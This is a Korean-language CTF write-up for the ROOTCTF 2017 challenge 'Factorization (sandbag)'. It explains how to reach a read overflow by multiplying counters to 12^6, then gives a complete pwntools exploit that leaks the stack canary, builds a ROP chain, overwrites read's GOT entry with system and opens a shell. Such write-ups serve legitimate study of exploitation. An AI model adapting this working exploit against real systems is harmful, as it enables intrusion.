[ROOTCTF 2017] Factorization(sandbag)

메인함수 모습이다.

먼저 취약점이 있는 부분은 아래와 같다.

오버플로우가 있는 read 취약점부분으로 가려면 a5(time)이 2985984가 되야 하며 입력은 4가 되어야한다.

어떻게 할지 a5(time)을 2985984로 만들어 줄지 고민했는데 문제 이름 자체가 인수분해(Factorization) 라서 저 숫자를 인수분해하면 12의 6승이 나온다.

3번 메뉴로 가서 sleep(4) 메뉴로 들어가면 곱하기를 하기 때문에 a1, a2, a3, a4, a5, a6 을 모두 12로 만들어준 후에 sleep을 하면 2985984가 될 것이다.

1번 메뉴에서 a1, a2, a3 2번 메뉴에서 a4, a5, a6 을 각각 12번 + 해준 후에 sleep 하고 취약점 있는 부분으로 가서 rop 하면 익스가 가능하다.

[Exploit]

from pwn import *
p = process('./sandbag')
e = ELF('./sandbag')
 
read_got = e.got['read']
offset = 0x9ad50 #read-system
pppr = 0x8048f49
pr = 0x8048f4b
 
for a in range(1, 3):
    for b in range(1,4):
        for c in range(12):
            print p.recv(1024)
            p.sendline(str(a))
            print p.recv(1024)
            p.sendline(str(b))
p.recv(1024)
p.sendline('3')
p.recv(1024)
p.sendline('4')
 
p.recv(1024)
p.sendline('5')
p.recv(1024)
 
p.sendline('2')
p.recv(1024)
p.sendline('4')
p.recv(1024)
p.sendline('A'*64)
 
p.recvuntil("A\n")
canary = u32("\x00"+p.recv(3))
print 'canary : ' + hex(canary)
print  p.recv(1024)
 
#rop start
payload = ''
payload += 'A'*0x40
payload += p32(canary)
payload += 'A'*4
#/bin/sh -> bss
payload += p32(e.plt['read'])
payload += p32(pppr)
payload += p32(0)
payload += p32(e.bss())
payload += p32(len('/bin/sh')+1)
#read leak
payload += p32(e.plt['puts'])
payload += p32(pr)
payload += p32(read_got)
#read_got -> system
payload += p32(e.plt['read'])
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)
#system(/bin/sh)
payload += p32(e.plt['read'])
payload += 'AAAA'
payload += p32(e.bss())
 
p.sendline('2')
p.recv(1024)
p.sendline('4')
p.recv(1024)
p.sendline(payload)
p.recv(1024)
p.sendline('6') #exit
p.recv(1024)
 
p.sendline('/bin/sh')
read = u32(p.recv(1024)[:4])
print 'read : ' + hex(read)
print 'system : ' + hex(read-offset)
p.sendline(p32(read-offset))
p.interactive()